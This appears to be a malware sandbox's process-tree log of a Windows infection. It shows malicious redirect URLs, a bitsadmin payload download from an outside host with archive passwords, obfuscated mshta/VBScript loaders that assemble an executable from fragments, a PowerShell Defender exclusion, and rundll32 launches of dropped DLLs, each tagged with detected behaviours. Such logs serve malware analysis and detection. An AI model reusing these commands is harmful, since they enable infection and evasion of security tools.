C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872154⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631194⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=12942314⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae8847185⤵
-
C:\Users\Admin\AppData\Local\Temp\cb-64ac4-189-332b9-61110b00bfb18\Kajusushyxi.exe"C:\Users\Admin\AppData\Local\Temp\cb-64ac4-189-332b9-61110b00bfb18\Kajusushyxi.exe"3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exe /eufive & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ie1syora.vi5\GcleanerEU.exe /eufive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 2046⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe /qn CAMPAIGN="654" & exit4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exeC:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe /qn CAMPAIGN="654"5⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ituxtlcz.rut\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633451195 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
- Enumerates connected drives
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exe & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exeC:\Users\Admin\AppData\Local\Temp\jptme4q0.gry\any.exe5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exe /mixfive & exit4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\2uvpasrm.kb2\gcleaner.exe /mixfive5⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6172 -s 2566⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exe /S & exit4⤵
-
C:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\pmoa3cxd.r1n\autosubplayer.exe /S5⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z6⤵
- Download via BitsAdmin
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"6⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio6⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio7⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa9CAC.tmp\tempfile.ps1"6⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe" ) do taskkill -F -Im "%~nXU"1⤵
-
C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXeSkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "5⤵
-
C:\Windows\SysWOW64\control.execontrol .\FUEj5.QM5⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM6⤵
- Loads dropped DLL
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM7⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F -Im "Fri1034cd265b5e0adcd.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 4562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 4562⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5232 -ip 52321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 3864 -ip 38641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4588 -ip 45881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4540 -ip 45401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5304 -ip 53041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4992 -ip 49921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 6176 -ip 61761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5236 -ip 52361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5512 -ip 55121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 5284 -ip 52841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3544 -ip 35441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5024 -ip 50241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 4672 -ip 46721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 5396 -ip 53961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 4540 -ip 45401⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5140 -ip 51401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\3A21.exeC:\Users\Admin\AppData\Local\Temp\3A21.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\3A21.exeC:\Users\Admin\AppData\Local\Temp\3A21.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\6180.exeC:\Users\Admin\AppData\Local\Temp\6180.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\6180.exeC:\Users\Admin\AppData\Local\Temp\6180.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6180.exeC:\Users\Admin\AppData\Local\Temp\6180.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\6180.exeC:\Users\Admin\AppData\Local\Temp\6180.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7200 -ip 72001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4660 -ip 46601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 6808 -ip 68081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Checks SCSI registry key(s)
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC1⤵
-
C:\Users\Admin\AppData\Local\Temp\C193.exeC:\Users\Admin\AppData\Local\Temp\C193.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 2482⤵
- Program crash
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\DAD8.exeC:\Users\Admin\AppData\Local\Temp\DAD8.exe1⤵
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5fd5d6a5-215d-4ecb-a634-11958d21e1d5\test.bat"3⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\DAD8.exe" -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\DAD8.exe"C:\Users\Admin\AppData\Local\Temp\DAD8.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 18122⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 3104 -ip 31041⤵
-
C:\Users\Admin\AppData\Local\Temp\2D3F.exeC:\Users\Admin\AppData\Local\Temp\2D3F.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 2562⤵
- Program crash
- Enumerates system info in registry
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\7229.exeC:\Users\Admin\AppData\Local\Temp\7229.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8008 -s 2562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2552 -ip 25521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 7096 -ip 70961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 8008 -ip 80081⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
-
C:\Program Files\Windows Defender\mpcmdrun.exe"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:51⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5884 -ip 58841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 440 -p 6060 -ip 60601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7048 -ip 70481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0AF591EB79C8CD6C81E2FCFBC2178825 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 191FD6F86B0010D2F41C83786C0EDF3F2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 23188DF435584527F3BA7A7E67AD8223 E Global\MSI00002⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6172 -ip 61721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 4562⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7732 -ip 77321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
